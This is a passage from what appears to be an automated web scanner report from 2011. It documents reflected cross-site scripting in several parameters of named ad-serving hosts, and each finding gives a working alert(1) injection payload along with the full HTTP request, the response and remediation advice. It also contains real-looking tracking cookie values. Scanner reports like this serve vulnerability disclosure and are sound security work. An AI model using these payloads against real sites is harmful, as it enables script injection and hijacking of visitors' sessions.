GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home441f3"%3balert(1)//f9173373918&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5615
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
dow._fw_slot_urls.length) setTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=-1&ssnw=&csid=idol_home441f3";alert(1)//f9173373918&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, fal
...[SNIP]...

1.4. http://1c6e2.v.fwmrm.net/ad/g/1 [flag parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the flag request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc08e"%3balert(1)//e62c1b5dde6 was submitted in the flag parameter. This input was echoed as dc08e";alert(1)//e62c1b5dde6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&flag=-ptildc08e"%3balert(1)//e62c1b5dde6&pvrn=649564&csid=idol_home&resp=ad;position=1;ptgt=s&envp=g_js&slid=174x174slot1&w=174&h=174 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209; _sid="b117_5659730864117770987"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317758783.0,20486.1317756298.0,20487.1317753554.0,20661.1317758783.0,^"; _pr="1317758780.438724.273825~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317758783.28800.0.4,sg143516.1317753552.1317758783.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5674
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:23 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...

   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=649564&vprn=&vip=50.23.123.106&vdur=&flag=-ptildc08e";alert(1)//e62c1b5dde6;position=1&;ptgt=s&slid=174x174slot1&envp=g_js&w=174&h=174&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e,
...[SNIP]...

1.5. http://1c6e2.v.fwmrm.net/ad/g/1 [pvrn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the pvrn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82666"%3balert(1)//929ea7ec66e was submitted in the pvrn parameter. This input was echoed as 82666";alert(1)//929ea7ec66e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=35583982666"%3balert(1)//929ea7ec66e&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5621
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:07:13 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
etTimeout(f, 10);
       setTimeout(d, 15000);
   };
   window._fw_slot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=35583982666";alert(1)//929ea7ec66e&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEven
...[SNIP]...

1.6. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77dd0'%3balert(1)//c3631c732ca was submitted in the slid parameter. This input was echoed as 77dd0';alert(1)//c3631c732ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot77dd0'%3balert(1)//c3631c732ca&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:14 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
id=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=";
var v = ('ptgt=s&slid=728x90slot77dd0';alert(1)//c3631c732ca&envp=g_js&w=728&h=90&lo=').replace(/envp=g_js/, '');
document.write(ct ? '<span id="728x90slot77dd0';alert(1)//c3631c732ca" class="_fwph">
...[SNIP]...

1.7. http://1c6e2.v.fwmrm.net/ad/g/1 [slid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the slid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ac4b"%3balert(1)//c5398e2c7f1 was submitted in the slid parameter. This input was echoed as 8ac4b";alert(1)//c5398e2c7f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&pvrn=355839&csid=idol_home&resp=ad;;ptgt=s&envp=g_js&slid=728x90slot8ac4b"%3balert(1)//c5398e2c7f1&w=728&h=90 HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.americanidol.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Content-Length: 5817
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:08:11 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function(){
var pht = !!('');
var psd = window._fw_link_tag_scan_delay || 1*'';
var mkv = !('');
if (isNaN(psd)) psd = 0;
var am = function(f) {
   try { return f._fw_admanager && (f._fw_admanager.load
...[SNIP]...
ot_urls = [];
   var u = "http://1c6e2.v.fwmrm.net/ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72488&ssnw=&csid=idol_home&sfid=&cdid=&pvrn=355839&vprn=&vip=50.23.123.106&vdur=&flag=;;ptgt=s&slid=728x90slot8ac4b";alert(1)//c5398e2c7f1&envp=g_js&w=728&h=90&lo=";
   if (document.addEventListener) {
       document.addEventListener( "DOMContentLoaded", e, false );
       document.addEventListener( "load", e, false );
   } else if (window.attachEven
...[SNIP]...

1.8. http://1c6e2.v.fwmrm.net/ad/g/1 [ssid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the ssid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb280"%3balert(1)//c49b9d5dfef was submitted in the ssid parameter. This input was echoed as cb280";alert(1)//c49b9d5dfef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766cb280"%3balert(1)//c49b9d5dfef&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759053.0,20487.1317759053.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759077.438724.273825~,1317759069.649564.253944~254114~254701~254705~254706~327790~327796~,1317759029.649564a2e5761a53c8824f4df602c.253944~,1317759028.a2e5761a1295382b71812f2c.253944~,1317759000.438724a2e5761a42d46e2b97deeb32.273825~,1317758999.a2e5761ada6b8f92dade7133.273825~,1317758974.753420735476538500a2e5761ac7192e3688f5cc71.687378~,1317758973.a2e5761a679e207142393da2.687378~,1317758909.470567.295053~295054~,1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg127945.1317758965.1317759077.28800.0.0,sg141659.1317753567.1317759077.28800.0.4,sg143516.1317753552.1317759077.28800.0.0,";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:11:17 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10311
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:11:16 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
,
{name:"_fw_creative_name", _:"FOX_20thCenturyFox_HP_300x250_RB_10/4 "
}]}
}]}
}]}
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766cb280";alert(1)//c49b9d5dfef", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{
...[SNIP]...

1.9. http://1c6e2.v.fwmrm.net/ad/g/1 [vprn parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1c6e2.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The value of the vprn request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b897"%3balert(1)//9d48bff7a00 was submitted in the vprn parameter. This input was echoed as 4b897";alert(1)//9d48bff7a00 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=72766&ssnw=&csid=FOX_home&sfid=&cdid=&pvrn=753420735476538500&vprn=4b897"%3balert(1)//9d48bff7a00&vip=50.23.123.106&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3669;_fw_h_x_flash_version=10%2C3%2C183%2C0;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=mrec&envp=g_js&w=300&h=250&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e2.v.fwmrm.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.fox.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1317753702.315.685841~690141~,1317753686..327814~,"; _cph="1317753686.588.1.1,"; _uid="b035_5653126437071259818"; _auv="g141659~1.1317753705.0,5.1317756218.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317756298.0,20486.1317756298.0,20487.1317753554.0,20661.1317756142.0,^"; _pr="1317756287.356210794765502200.544604~654718~,1317756230.665287661366164700.654718~,1317756209.475132.556271~556272~,1317756129.232456024503335360.687378~,1317753701.770460b588bc52d3cc9c2f7e6d32f.253944~,1317753700.307485244702547800.255138~664977~687378~,1317753686.3088.327815~,1317753670.438724b588bc52d19dc5a432a71432.273825~,1317753669.307485244702547800b588bc52b4a60335e00cb21d.687378~,1317753668.b588bc5297726afe90b6fd7e.687378~,1317753660.770460.253944~254114~254701~254705~254706~303817~327796~,"; _sc="sg141659.1317753567.1317756298.28800.0.4,sg143516.1317753552.1317756298.28800.0.0,"; _wr="g143516"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3e45525d5f4f58455e445a4a423209

Response

HTTP/1.1 200 OK
Set-Cookie: _uid="b117_5659731851959818893";expires=Wed, 03 Oct 2012 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g141659~1.1317753705.0,5.1317759064.0,20487.1317759064.0,20488.1317756218.0,20499.1317753705.0,20592.1317753702.0,^g143516~5.1317759023.0,20486.1317756298.0,20487.1317759023.0,20661.1317756142.0,^";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1317759136.753420735476538500.544603~664977~687378~,1317759135.438724.273825~,1317759133.753420735476538500]]>>.687378~,1317759132.753420735476538500".687378~,1317759131.753420735476538500
Set-Cookie: _sc="sg127945.1317758965.1317759136.28800.0.0,sg141659.1317753567.1317759136.28800.0.4,sg143516.1317753552.1317759136.28800.0.0,";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g143516";expires=Thu, 03 Nov 2011 20:12:16 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Content-Length: 10330
Pragma: no-cache
Vary: Accept-Encoding
Date: Tue, 04 Oct 2011 20:12:15 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
}]}
}]}
}],
"siteSection":[
{customId:"FOX_home", id:"72766", pageViewRandom:"753420735476538500", _:{
"videoPlayer":[
{_:{
"videoAsset":[
{id:"-1", videoPlayRandom:"4b897";alert(1)//9d48bff7a00", _:{
"adSlots":[
{_:null
}]}
}]}
}],
"adSlots":[
{_:{
"adSlot":[
{customId:"mrec", _:{
"selectedAds":[
{_:{
"adReferenc
...[SNIP]...

1.10. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6604e'-alert(1)-'f0a94848b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 498
Date: Tue, 04 Oct 2011 20:31:19 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=sea-dc-dc%5D%5D%3E%3E%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Thu, 03-Nov-2011 20:31:19 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/iblocal.3interactive.ron6604e'-alert(1)-'f0a94848b6/n7061_728ros;kw=n7061_728ros;sz=728x90;net=iblocal;ord=0.7794340003747493;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.11. http://a.collective-media.net/adj/iblocal.3interactive.ron/n7061_728ros [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.3interactive.ron/n7061_728ros

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40e0a'-alert(1)-'c3c00823c89 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.3interactive.ron/n7061_728ros40e0a'-alert(1)-'c3c00823c89;kw=n7061_728ros;sz=728x90;ord=0.7794340003747493? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=305;c=8005/1752/1;s=638;d=14;w=728;h=90
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 499
